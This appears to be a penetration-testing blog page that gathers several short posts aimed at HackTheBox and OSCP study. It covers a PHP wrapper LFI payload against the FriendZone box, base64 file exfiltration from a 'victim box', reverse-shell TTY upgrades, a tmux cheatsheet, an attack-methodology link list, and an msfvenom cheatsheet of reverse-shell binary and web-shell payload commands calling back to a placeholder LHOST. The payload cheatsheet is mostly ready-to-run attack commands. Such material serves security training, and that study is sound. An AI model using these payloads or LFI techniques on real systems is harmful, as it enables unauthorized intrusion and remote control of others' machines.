Category: Tips & Tricks

Tips & Tricks, WebApp 101

Using PHP Wrappers within LFI to Obtain PHP Script Source Code

Posted on by Harley

You find a Local File Inclusion (LFI) running PHP, you’re able to leverage a PHP wrapper to convert the file to Base64, which you can then decode on your own machine to view the source-code of the page.

In this example, we’ll be using FRIENDZONE on HackTheBox.

Confirming LFI on our example

At the following URL, we found that we have LFI capabilities on the ?pagename parameter. https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=login

If we adjust ?pagename to the name of a php page that exists on the box, it will display that page beneath the “Something wen worng” text. For example, let’s view the contents of a php page named timestamp.php.
https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=timestamp

Using Base64 Encoding to View Source Code

We can specify the following PHP Wrapper to encode a file in Base64.

php://filter/convert.base64-encode/resource=<filename>

Let’s inject that into our LFI, and specify the file we want to view the contents of (login.php)
https://administrator1.friendzone.red/dashboard.php?image_id=z.gif&pagename=php://filter/convert.base64-encode/resource=login

Now, let’s copy that returned Base64 and run the following command within Kali.

echo -n <Base64> | base64 -d

The results show us the source code of login.php! We could also rerun the above command with > login.php appended to save our own file.

That’s it! Super simple.

0
Tips & Tricks

Transferring Files via Base64

Posted on by Harley

Depending on the size of the file, you may not want to go through the hassle of transferring it via Netcat, FTP, or some other file transfer method.

In some cases, you can convert a file to Base64 code, and then simply copy/paste the code between the machines.

We’ll do that here. There is a file named viewuser on our victim box we want to copy to our Kali attacking machine. I already have a SSH connection to the victim box. Let’s start by converting the file to Base64.

base64 -w0 /usr/bin/viewuser

Note: -w0 gets rid of line wrapping.

We’ll highlight the code and then Copy Selection.

With that in our clipboard, head over to your Kali machine and let’s create a file called viewuser.b64

gedit viewuser.b64

Paste the code and Save the file.

Now just run the following command to decode the contents and dump it into a new file.

base64 -d viewuser.b64 > viewuser

That’s it! You’ve successfully transferred the file between machines.

0
Tips & Tricks

Upgrading Simple Shells to Interactive TTYs w/ Python

Posted on by Harley

This is a quick and easy post, mainly for my own reference moving forward. It will showcase how to upgrade and improve your reverse shells so that they are more user friendly.

Once you have a reverse shell, start by running the command

python -c 'import pty;pty.spawn("/bin/bash")'

Now we’ll background the window with Ctrl + Z. We’ll be taken back to our Kali terminal window.

In the Kali terminal, type in stty raw -echo. It will appear like nothing happened, but then type in fg. Note: The text you type here will not display.

Press Enter. This will repopulate the command you ran to capture the shell, and then Enter a 2nd time. This will take you back to your reverse shell.

Now, you can run export TERM=xterm, which will allow you to do things like clear the screen.

Fixing Rows/Columns

If you need to run vi, you may find that your shell doesn’t display the editor correctly. For example, it may not fill out the entire terminal window (see image below).

To fix this, we’ll need to adjust the row and columns. From a new terminal window (on your local machine), run the following command.

stty -a

Make note of the returned rows and columns. Back in your shell, run the following command to configure the terminal with the correct number of rows/columns.

stty rows <insert> columns <insert>

Now running vi will work correctly.

0
Tips & Tricks

Tmux Cheatsheet for Splitting Terminal Panes and More

Posted on by Harley

Note: <PrefixKey> by default is Ctrl + B

Creating Tmux Sessions and Windows

tmux new -s ExampleCreate a new tmux session titled “Example”
<PrefixKey> + CCreate a new window within the session
<PrefixKey> + NumberTake you to your different windows. Windows are identified by the banner down below.
<PrefixKey> + ,Rename the current Window. 
<PrefixKey> + DDetach your tmux session from the terminal window.
tmux attach-session -t ExampleReattach to a session titled “Example”

Window Splitting

<PrefixKey> + %Vertical Split
<PrefixKey> + "Horizontal Split
<PrefixKey> + <ArrowKey>Move around between your panes
<PrefixKey> + ZZoom in and fill out pane you’ve got selected. Do it a 2nd time to zoom out.
<PrefixKey> + Hold Ctrl + <ArrowKey>Resizes the pane
<PrefixKey> + {Move pane to the left
<PrefixKey> + }Move pane to the right
<PrefixKey> + <SPACE>Toggle shuffling the panes

Helpful Command Line Tricks

Ctrl + AGo to beginning of line
Ctrl + E Go to end of line 
Ctrl + <ArrowKey>Move word by word in the line
Alt + .This will autofill the last word you used from this position in the previous command.
Ctrl + RRecursively search through your command history. 

Navigating the Terminal

<PrefixKey> + [Enter Edit Mode.
While in Edit Mode:
q 		This will exit edit mode.
While in Edit Mode:
Ctrl + <ArrowKey>		This will allow you to scroll.
While in Edit Mode:
<ArrowKey>		Move around the terminal window.
0
Pentesting, Tips & Tricks

Hacking Methodology Cheatsheet

Posted on by Harley

This post is going to contain a list of common tools, vulnerabilities, & methodology tactics broken down by category and contains links to references that will showcase examples. This document will be updated often as I work through more and more resources.

Enumerating Common Services

Enumerating SMB 139,445

  • Using smbmap and smbclient to crawl and browse shares. Example of this in HTB FriendZone – Link to Ippsec video.

Enumerating LDAP 389

External Tools/Methodology

Using Hydra to Brute-Force Websites

Using ASP/ASPX Webshells

Enumerating Tomcat

Enumerating HTTP Proxies

Connecting to/Abusing IRC

Performing Zone Transfers

Local/Remote File Inclusion (LFI & RFI)

  • Using PHP Wrappers within LFI to Obtain PHP Script Source Code — My post
  • XML Entity Injection (XXE) Vuln for LFI. HackTheBox: DevOops. – Link to Ippsec Video

Privilege Escalation Techniques/Tools

Privilege Escalation: Using Sherlock

Privilege Escalation: Using Windows-Exploit-Suggester

Pivoting & Utilizing Proxies

Routing Tools Through Proxies

Common Vulnerabilities

Exploiting MS17-010 (EternalBlue)

  • HackTheBox: Blue

Exploiting MS14-066 (Heartbleed)

Exploiting CVE-2016-5195 (DirtyCow)

Common Active Directory Attacks

Abusing LLMNR/NBT-NS w/ Responder

Abusing IPv6

Utilizing CrackMapExec

0
Tips & Tricks

Unzipping Rockyou.txt.gz in Kali Linux

Posted on by Harley

Encrypt and Anonymize Your Internet Connection for as Little as $3/mo with PIA VPN. Learn More

Stupid simple post. Creating this as I never remember the syntax and have to look it up each time I spin up a new VM. Posting the command here for my own personal gain in the future.

sudo gzip -d /usr/share/wordlists/rockyou.txt.gz

If you like Hacking Content, you should check out my YouTube channel!
https://www.youtube.com/c/infinitelogins

11
Tips & Tricks

MSFVenom Reverse Shell Payload Cheatsheet (with & without Meterpreter)

Posted on by Harley

Encrypt and Anonymize Your Internet Connection for as Little as $3/mo with PIA VPN. Learn More

There are tons of cheatsheets out there, but I couldn’t find a comprehensive one that includes non-Meterpreter shells. I will include both Meterpreter, as well as non-Meterpreter shells for those studying for OSCP.

Table of Contents:
– Non Meterpreter Binaries
– Non Meterpreter Web Payloads
– Meterpreter Binaries
– Meterpreter Web Payloads

Non-Meterpreter Binaries

Staged Payloads for Windows

x86msfvenom -p windows/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x86.exe
x64msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x64.exe

Stageless Payloads for Windows

x86 msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x86.exe
x64 msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x64.exe

Staged Payloads for Linux

x86msfvenom -p linux/x86/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x86.elf
x64 msfvenom -p linux/x64/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x64.elf

Stageless Payloads for Linux

x86 msfvenom -p linux/x86/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x86.elf
x64 msfvenom -p linux/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x64.elf

Non-Meterpreter Web Payloads

aspmsfvenom -p windows/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f asp > shell.asp
jspmsfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > shell.jsp
warmsfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f war > shell.war
phpmsfvenom -p php/reverse_php LHOST=<IP> LPORT=<PORT> -f raw > shell.php

Meterpreter Binaries

Staged Payloads for Windows

x86msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x86.exe
x64msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x64.exe

Stageless Payloads for Windows

x86msfvenom -p windows/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x86.exe
x64msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x64.exe

Staged Payloads for Linux

x86msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x86.elf
x64msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x64.elf

Stageless Payloads for Linux

x86msfvenom -p linux/x86/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x86.elf
x64msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x64.elf

Meterpreter Web Payloads

aspmsfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f asp > shell.asp
jspmsfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > example.jsp
warmsfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f war > example.war
phpmsfvenom -p php/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > shell.php

Donations and Support:
Like my content? Please consider supporting me on Patreon:
https://www.patreon.com/infinitelogins

Purchase a VPN Using my Affiliate Link
https://www.privateinternetaccess.com/pages/buy-vpn/infinitelogins

๐Ÿ‘‡ SUBSCRIBE TO INFINITELOGINS YOUTUBE CHANNEL NOW ๐Ÿ‘‡
https://www.youtube.com/c/infinitelogins?sub_confirmation=1

4